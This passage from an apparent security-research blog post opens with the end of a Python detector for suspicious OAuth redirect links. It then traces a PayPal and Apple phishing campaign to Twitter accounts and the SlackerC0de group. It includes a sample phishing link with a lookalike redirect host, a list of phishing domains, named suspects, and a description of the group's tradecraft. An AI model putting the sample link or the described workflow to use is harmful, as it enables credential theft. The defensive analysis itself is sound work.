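    """Classify a link: where it starts and where each redirect_uri ends."""
    outer = hostname_of(url)
    redirects = []
    for target in redirect_uris(url):
        host = hostname_of(target)
        redirects.append({
            "redirect_uri": target,
            "host": host,
            "trusted": is_trusted_host(host),
            "lookalike": is_brand_lookalike(host),
        })
    # Any redirect target off the trusted domain is suspicious; a trusted
    # outer host is exactly what lends such a link its credibility.
    suspicious = any(not r["trusted"] for r in redirects)
    return {"outer_host": outer, "outer_trusted": is_trusted_host(outer),
            "redirects": redirects, "suspicious": suspicious}


AUTHORIZE = "https://www.paypal.com/webapps/auth/protocol/openidconnect/v1/authorize"

# Constructed sample modelled on the link in the post (client_id is a placeholder).
PHISHING_LINK = (AUTHORIZE + "?client_id=PLACEHOLDER_CLIENT_ID&response_type=code"
                 "&scope=openid%20profile%20email%20address%20phone"
                 "&redirect_uri=https://www.paypal.com-signinaccountsafe.info/stylec0de")
# Constructed benign counterpart: the redirect stays on paypal.com.
BENIGN_LINK = (AUTHORIZE + "?client_id=PLACEHOLDER_CLIENT_ID&response_type=code"
               "&scope=openid&redirect_uri=https://www.paypal.com/signin")

if __name__ == "__main__":
    for link in (PHISHING_LINK, BENIGN_LINK):
        result = assess_link(link)
        verdict = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{verdict}: starts at {result['outer_host']}")
        for r in result["redirects"]:
            print(f"  redirect_uri -> {r['host']} "
                  f"(trusted={r['trusted']}, lookalike={r['lookalike']})")
```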
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="34" src="https://lh6.googleusercontent.com/_0oI_MibIHMXv_sygeeeMbWP4ktGp2BCwfPGtkML-lwQ5xtqi_9izRbxn6dvQE9GpC_IsO1pPW4v5lueTUfvEt0zOB-Riz_cSOqCNEhJI1QIXDBszeZtpOoM16lKDOlKpPHWOQrE" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="640" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Source code.</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="285" src="https://lh6.googleusercontent.com/CZbRrFyV2Yi5e4KH6netqkxrcHMHRUrtHGxD1AIa4JjllbsysAmGvyECIBTjU7ui94DWv-UzZuRbjZVdm1vi2LUwWoPUm8XsyBCNOg2zvByHW-s5uNmAQQAqXNQ705zmO2286yMg" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Screenshot of the Spoofed login page.</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: medium;">Twitter Activity</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">From this point on we only had the now blocked websites left to go over. However, because the attacker chose a t.co shortened link, the activity can be traced back to Twitter, so we can hunt for anyone who was spreading these links, look for new activity, and perhaps even find out who is behind this.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">We were able to identify the following accounts, which seem to be based out of Indonesia:</span></div>
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/StyleC0de</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/nugslackerc0de</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/shortermrguest</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/uboldmild</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/AqsaAssegaf</span></li>
</ul>
</blockquote>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">All of these accounts were using the same method and similar links. The original link from the screenshot could be found being spread by @uboldmild:</span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="405" src="https://lh4.googleusercontent.com/5WEAfsKNsvhg5GRGJ5W1VnzrS4UO6dZoSrjFOgijfudeeYKO2-FjyknmG_v9mI5M0m3q6G5hl35jAfx6KB-Fq38ktqBz9bzMYZEKuahV1psrP66HmXb9ob-JOw7BFwMon9Pdb8Uf" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Tweet of the original link.</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">As an elementary step in an investigation like this, we checked the usernames and names left by these individuals. </span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">The Twitter user “Donna Curry” was registered under the handle ‘uboldmild’. Pivoting on that handle with a simple search engine query, we found it was connected to numerous phishing websites using the same scheme, registered under the email uboldmild@yahoo.com.</span><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Websites such as:</span></span></div>
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">step-verivy[.]com</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">app-recoveryicloud[.]com</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">data-recoveryicloud[.]com</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">idmsa-accounts-security[.]com</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">datarecoveryicloud[.]com</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">com-verifyaccountappstore[.]info</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">responsibilitiesmacintosh[.]com</span></li>
</ul>
</blockquote>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Looking at the Twitter account lets us correlate this further with the sort of links the user has tweeted out:</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif; margin-left: 1em; margin-right: 1em;"><img height="452" src="https://lh6.googleusercontent.com/gFiF8Nj9JNKB8--jq6KM6GN2-QWsmy70xXsl8V78oaQyhswAmfjWPvGvB5tMZucsjXHwD8cy-8Y-65tC51cM_DfYyUgNZ6b1znRTZIbB05tnwN4avQo5XvW8RlGxEthZlpVAMShX" style="border: none; transform: rotate(0rad);" width="585" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">What looks like the first tweet was made in June 2017 to test out how the link shortener works. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">This shows that while the phishing kits they used may have evolved over the past year, their initial weaponization point, Twitter’s link shortener, had not. </span></span><br />
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">When checking the rest of the users, we found that @StyleC0de has been doing the same, as can be seen through his Twitter account as well. However, he has done so under his actual name, which can be traced back to the numerous social media profiles he holds under that name, </span><span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">including a YouTube video showing a script he intended to sell in 2017:</span></div>
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><a href="https://www.youtube.com/watch?v=agJxjXoUfBY" style="text-decoration: none;">https://www.youtube.com/watch?v=agJxjXoUfBY</a></span></span></blockquote>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">His latest exploit, which was still live when we were writing this post, is the one we showed above under the username and calling card he still uses, ‘StyleC0de’.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: medium;">SlackerC0de spam group </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">SlackerC0de is an Indonesian hacking group that surfaced around 2015 with various low-level scripts aimed at financial scams.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">When we checked the Twitter user @nugslackerc0de, his username stood out as well. It led us to the Indonesian group found at slackerc0de.us, and this group might actually prove to be the connection point between these Indonesian users. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="398" src="https://lh5.googleusercontent.com/6pDFKlpwtbPsdQCrCh8gHKHdpQJIOXggO3KRElVfhXDb6uxWGj_fhc4sNLkgmZxuhRj4rOLnlajGaGF-FS0HuJW3WTkAcrH2_Fr-5lOvqCF3EW9OOsyJY_gD4SVdhlpz1iyC-rvH" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="565" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">An Apple account checker script shared on Pastebin.</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">The main name that kept popping up in source code belonging to the group was ‘Malhadi Jr.’, with websites like malhadi.slackerc0de.us hosting online tools such as email bots and account checkers, and even an old personal GitHub account, https://github.com/MalhadiJr, sharing similar repositories.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">We were also able to see that one of his tools was used last year for a phishing website with a similar URL. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="63" src="https://lh6.googleusercontent.com/s6C8qy1gCTnPv-26_H8WVgLUpaGwoZJN82Aj71X8zMR9qpRARh5AX8JRrfiz6L58kryB8TQhMeSlQcz2eFjCQCrEILj1ENEbeC93rbj5uDRMueSiBAs-GebOLVNDv21rGCpeE3PC" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Source: ServiceHostNet</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Taken together with our recent finding, the Slackerc0de group indeed seemed to be the key to identifying what the different users had in common. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Slackerc0de themselves invite any prying eyes to a public group on Telegram where they share their tools of the trade. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif; margin-left: 1em; margin-right: 1em;"><img height="334" src="https://lh5.googleusercontent.com/lLPE6-ftY9hsUHgNsoTtLXa9Gv8wXUuCYBgDSAfwB8rdZsTbIaV0OvARQeaiVRL_8G1yyVv9ONze0oHw3VGUYuDZDp5YSKMb9A4MhPL3bqmEVpeqiLQkwEErfb7rtgDqPInK-r6T" style="border: none; transform: rotate(0rad);" width="476" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">When we peeked inside the group, we were able to see behind the scenes of a relatively close-knit group collaborating on phishing efforts, like this user asking what a good subject line for Yahoo email recipients is:</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"> </span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif; margin-left: 1em; margin-right: 1em;"><img height="330" src="https://lh4.googleusercontent.com/rNGzKpgtDYeBxBTPl4WaHfIdOuIz4xKmtZOV7GWvSAA-7n_4KZFzdPIAosAbcBpVOp6-39ID-AEwSsQ9NCoPDJEtZpuucLzBOoGOU0t0cHMKPqXhjmWtQfGcKpY0vDq968bDqyDy" style="border: none; transform: rotate(0rad);" width="540" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="white-space: pre-wrap;">A now-deleted user instructing another member on his preferred link shorteners, such as Twitter’s and Owly: </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif; margin-left: 1em; margin-right: 1em;"><img height="350" src="https://lh3.googleusercontent.com/SmmDYT0IOT552kJiMKX1hng891N7QIkTA9gd6vnHTVCJuINDiFkvPRnOw9f6KQ4b__H6MQ0OB58I9yuWOilz_pMiNi9HAM9sObsJuk3u1ENofUZtypeszfHHdv70X1nhTZWoRJ7f" style="border: none; transform: rotate(0rad);" width="551" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">And another one sharing a PayPal phishing kit’s source code for download:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif; margin-left: 1em; margin-right: 1em;"><img height="442" src="https://lh6.googleusercontent.com/suuqzadBQSBe9LDN-p_ahdqfgaaRqDdsbtwmFKw7-mo-GQbvJeQr7cltP8YEyOL6EO6gCS-QNUR-2tYhoCjLlDQvNsA3XoE9dbbKoAjg6bkenXiWWL37vV_m2AE9Ci5yBp8wbmMc" style="border: none; transform: rotate(0rad);" width="435" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">A user sharing a screenshot of a mailer in use, with their Apple phishing website visible in the background:</span></span><br />
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS2kMPWN3X22AL4jdyBGWRrfQ6i18bG3y2XaTJeFbKUHHyV9vnUV1uBE7ONwfSuD2r5I0clnsilUzdmu8bpbvtMeNnv8zS9ihyphenhyphengwBCwnofRuHRUeTlogi7lWu-WVVFYAh7p75jdPKQa_hT/s1600/apple.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><img border="0" data-original-height="768" data-original-width="1366" height="359" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS2kMPWN3X22AL4jdyBGWRrfQ6i18bG3y2XaTJeFbKUHHyV9vnUV1uBE7ONwfSuD2r5I0clnsilUzdmu8bpbvtMeNnv8zS9ihyphenhyphengwBCwnofRuHRUeTlogi7lWu-WVVFYAh7p75jdPKQa_hT/s640/apple.jpg" width="640" /></span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">We can see this Indonesian group is active with focused efforts in cheating people out of their money, adding insult to injury with boasting their success while sharing screenshots of incoming credentials:</span></span><br />
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsrtlmSCcH2Ed8vr8ZSh5SRpNXgtR5207AHhlBb7EQM1T_MCamN3AfrUznzvOzO4deDcQVFOtP1KCCP1nQYpbagO_iC7SHFB3fCW5vHRp2CsjnLsvrJjNN9V7aiRWYRaXHfAqWSOTVvN2M/s1600/e57ef509-f094-4c20-b7ff-e40b82a3fbe5.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsrtlmSCcH2Ed8vr8ZSh5SRpNXgtR5207AHhlBb7EQM1T_MCamN3AfrUznzvOzO4deDcQVFOtP1KCCP1nQYpbagO_iC7SHFB3fCW5vHRp2CsjnLsvrJjNN9V7aiRWYRaXHfAqWSOTVvN2M/s640/e57ef509-f094-4c20-b7ff-e40b82a3fbe5.jpg" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">An attacker sharing his harvested credentials.</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: medium;">Tactics,Techniques, and Procedures</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">This group and those like it operate by initially gathering email lists, ones that can be curated manually, or downloaded from the various cyber crime forums online. Once they have an adequate enough list they will move to their next step - checking the emails for corresponding accounts. They will input the emails they have into account checkers made by the likes of Malhadi Jr from SlackerC0de and see what emails have PayPal accounts, what emails have Apple accounts by utilizing various API calls to these services and see their response. Both these companies seem to be their favorite targets. </span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">Once they have amassed a large enough list to move on and start attacking them, these attackers will create a phishing infrastructure for the most crucial steps of their campaign. They will create an online website, mostly hosted by Amazon,Google, or Aruba (the same company they used as a fake receipt for one of their emails) from looking at how this specific group operates. They will host their phishing kit and start mass emailing their list using a bought emailer software from their closed forum marketplace or shared by somebody from the chat group.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">To receive the incoming credentials they manage to steal, they will set up an inbox based on free email services like Yandex. Not much skill is needed to run such a scheme - they will need to only configure the source code for their email, upload to a server, and use an email template. By going over their correspondence we saw how users with no skill whatsoever were asking for resources,more experienced users sharing them, and the backbone to these groups - the tool creators or sellers which supply the 955 members of the group with the easy means of creating their own campaign. </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">We witnessed how they share their various setbacks after they launch their campaign, such as Amazon blocking their accounts, screwing up the %email field, failing to configure a server, and more. Meaning even an attacker at the lowest level of skill will be spoon fed the answer to his mistake and how to correct it for the campaign to work. Causing dire consequences to the victims which fall due to this criminal crowdsourcing. </span><br />
